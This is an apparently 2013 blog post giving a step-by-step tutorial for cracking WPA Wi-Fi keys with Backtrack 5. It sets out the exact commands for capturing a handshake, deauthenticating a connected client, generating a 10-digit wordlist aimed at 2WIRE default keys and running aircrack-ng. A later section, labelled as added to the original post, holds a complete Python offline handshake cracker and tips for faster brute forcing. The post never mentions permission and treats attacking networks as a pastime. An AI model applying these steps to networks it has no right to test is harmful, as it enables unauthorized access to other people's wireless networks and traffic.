Wednesday, October 30, 2013

WPA Cracking with Backtrack 5

Well, I decided to do a quick write-up of WPA cracking with Backtrack 5. The other day I was bored, so I decided, fuck it, why not? So I figured, hell, I'll make a guide while I'm at it.
1. Load up Backtrack (I was using Backtrack 5 R2)
2. Open up a terminal
Type in:

airmon-ng start {WIRELESSADAPTER}

That puts your adapter into monitor mode and creates a separate monitor interface, normally "mon0", which is the interface name you use from here on. Check airmon-ng's output rather than assuming: if a monitor interface already exists you get mon1, and `airmon-ng check` will list processes (network managers, wpa_supplicant) that can knock the card back out of monitor mode.
3. In the terminal window type in:

airodump-ng mon0

To capture a handshake (the four-way WPA handshake is what we will actually be cracking) you need a client that is already associated with the access point you want to attack. airodump-ng tells you this: the lower section of its screen lists stations, and a station whose BSSID column shows the target AP's MAC is a connected client.
4. Copy down the AP MAC (the BSSID column), the client MAC (the STATION column), and the AP's channel (the CH column).
Once you have those three values you can close the airodump-ng window.
5. In a new terminal window type in:

airodump-ng -w {CAPFILENAME} --bssid {APMAC} -c {APCHANNEL} mon0

That locks the capture to the target AP on its channel (so the card does not hop away at the moment the handshake happens) and writes everything to {CAPFILENAME}-01.cap; airodump-ng adds the -01 suffix itself. Leave it running. In another terminal, use aireplay-ng to deauthenticate the client: it will reconnect to the AP and redo the four-way handshake while airodump-ng is watching. Here's how we do it:

aireplay-ng --deauth 1 -a {APMAC} -c {CLIENTMAC} mon0

After you do that, airodump-ng should show "WPA handshake: {APMAC}" in the top-right corner of its screen. If it doesn't, the client may not have reconnected yet; give it a few seconds and send the deauth again rather than flooding it. That's it, you're done with getting the handshake. Now it's time for the long part: cracking the handshake.
How long it takes depends on your computer and your wordlist. In this example I was attacking a 2WIREXXX network, which in most cases uses a default 10-digit numeric passcode. That makes the keyspace small and well defined (every 10-digit number, 10^10 candidates), and you can run this command in Backtrack to have crunch write that wordlist for you. Be warned that it is about 110 GB on disk (10^10 lines of 11 bytes), so make sure you have the space before you start:

/pentest/passwords/crunch/crunch 10 10 0123456789 -o /pentest/passwords/wordlists/2wirewl.txt

After that, it's your choice what to do with it. You can keep cracking on Backtrack with pyrit, aircrack-ng, cowpatty, etc., or you can copy the capture to Windows and use an application like Elcomsoft Wireless Security Auditor. For aircrack-ng run the following command (the -01 suffix is the one airodump-ng added to the file name you gave it in step 5):

aircrack-ng {CAPFILENAME}-01.cap -w /pentest/passwords/wordlists/2wirewl.txt
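What aircrack-ng is doing while that runs, as an added example that is not part of the original post and not aircrack-ng's own code: for each candidate key it derives the PMK with PBKDF2 (4096 rounds of HMAC-SHA1, which is the entire reason cracking is slow), expands it into the PTK using the two MACs and two nonces that are public in the capture, and recomputes the MIC on handshake message 2 with the first 16 bytes of the PTK. A matching MIC means a correct key. The network name, MACs, nonces and key below are constructed stand-ins for the values a real run would parse out of the .cap file, and the frame layout is the WPA2 (RSN, HMAC-SHA1) one; original WPA/TKIP handshakes use HMAC-MD5 for the MIC instead.

```python
# Added example, not from the original post: what aircrack-ng does with the
# handshake and a wordlist, implemented by hand for a WPA2 (RSN, HMAC-SHA1)
# four-way handshake. The SSID, MACs, nonces and key below are constructed
# stand-ins; a real run would pull them out of the .cap file.
import hashlib
import hmac
import itertools

def pmk(passphrase, ssid):
    """Passphrase -> PMK: PBKDF2-HMAC-SHA1, salt = SSID, 4096 rounds, 32 bytes.
    Those 4096 rounds (roughly 8192 SHA-1 calls) are the whole cost per guess."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)

def prf512(key, label, data):
    """IEEE 802.11 PRF: concatenate HMAC-SHA1(key, label || 0x00 || data || i)."""
    out = b"".join(hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
                   for i in range(4))
    return out[:64]

def ptk(pmk_bytes, ap_mac, client_mac, anonce, snonce):
    """PTK from the PMK, both MACs and both nonces (the public parts of the handshake).
    The first 16 bytes are the KCK, the key that MACs the EAPOL-Key frames."""
    data = (min(ap_mac, client_mac) + max(ap_mac, client_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf512(pmk_bytes, b"Pairwise key expansion", data)

MIC_OFFSET = 81  # 4-byte EAPOL header + 77 bytes of EAPOL-Key fields before the MIC

def build_eapol_msg2(snonce):
    """Constructed handshake message 2 (client -> AP) laid out as an RSN EAPOL-Key
    frame with the MIC field zeroed; the MIC is computed over exactly these bytes."""
    body = (b"\x02"                   # descriptor type: RSN (WPA2)
            + b"\x01\x0a"             # key info: MIC set, pairwise, version 2 (HMAC-SHA1-128)
            + b"\x00\x10"             # key length 16 (CCMP)
            + b"\x00" * 7 + b"\x01"   # replay counter
            + snonce                  # 32-byte SNonce
            + b"\x00" * 16            # key IV
            + b"\x00" * 8             # key RSC
            + b"\x00" * 8             # key ID (reserved)
            + b"\x00" * 16            # MIC field, zeroed for the calculation
            + b"\x00\x00")            # key data length 0
    return b"\x01\x03" + len(body).to_bytes(2, "big") + body  # EAPOL v1, type Key

def eapol_mic(kck, eapol_zeroed):
    """Key descriptor version 2: MIC = first 16 bytes of HMAC-SHA1(KCK, frame)."""
    return hmac.new(kck, eapol_zeroed, hashlib.sha1).digest()[:16]

def make_handshake():
    """Constructed handshake for a hypothetical 2WIRE network with a 10-digit key,
    standing in for the fields airodump-ng would have written to the .cap file."""
    ssid, real_key = "2WIRE123", "7351902468"
    ap_mac = bytes.fromhex("001e0a112233")       # constructed BSSID
    client_mac = bytes.fromhex("0021f4aabbcc")   # constructed station MAC
    anonce, snonce = bytes(range(32)), bytes(range(32, 64))
    frame = build_eapol_msg2(snonce)
    kck = ptk(pmk(real_key, ssid), ap_mac, client_mac, anonce, snonce)[:16]
    return {"ssid": ssid, "ap_mac": ap_mac, "client_mac": client_mac,
            "anonce": anonce, "snonce": snonce, "eapol_zeroed": frame,
            "mic": eapol_mic(kck, frame)}

def crack(hs, candidates):
    """The offline attack: for each guess derive PMK -> PTK -> KCK, recompute the
    message-2 MIC and compare it with the captured one. Returns the key or None."""
    for guess in candidates:
        kck = ptk(pmk(guess, hs["ssid"]), hs["ap_mac"], hs["client_mac"],
                  hs["anonce"], hs["snonce"])[:16]
        if hmac.compare_digest(eapol_mic(kck, hs["eapol_zeroed"]), hs["mic"]):
            return guess
    return None

def digit_keys(length=10):
    """Same keyspace as 'crunch 10 10 0123456789', generated lazily instead of
    being written to disk (10^10 lines would be roughly 110 GB)."""
    return ("".join(t) for t in itertools.product("0123456789", repeat=length))

def days_to_exhaust(keyspace, keys_per_second):
    """How long a full run of the keyspace takes at a given keys-per-second rate."""
    return keyspace / keys_per_second / 86400

if __name__ == "__main__":
    hs = make_handshake()
    # A short constructed candidate list with the real key in it.
    print(crack(hs, ["0000000000", "1234567890", "7351902468"]))
    # Only the first 500 keys of the full 10-digit space, to keep the demo quick.
    print(crack(hs, itertools.islice(digit_keys(), 500)))
    print(round(days_to_exhaust(10 ** 10, 1500), 1), "days at 1500 keys/s")
```

Two practical points fall out of this. Everything the attacker needs (SSID, both MACs, both nonces, message 2 with its MIC) is sent in the clear, so once the .cap exists the attack is entirely offline and can run on any machine. And because the only per-guess cost is the PBKDF2 step, there is no need to write the crunch output to disk first: aircrack-ng accepts a wordlist on standard input with `-w -`, so crunch can be piped straight into it.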

Just a quick run-through. Getting the handshake is easy; it's the cracking that takes a while. Hope they have WPS: if they do, it becomes much easier ;) There are also several wordlists available, and you can use whatever wordlist you want. As long as you have the capture file you can crack it on any system, so you'll want one with a lot of processing power, RAM, and a supported graphics card to get upwards of 1500+ k/s (keys per second) [for example my laptop is averaging 300 k/s, total crap, and will never finish]. For scale, the full 10-digit keyspace is 10^10 candidates, which takes about 77 days to exhaust at 1500 keys per second.
Enjoy WPA cracking!

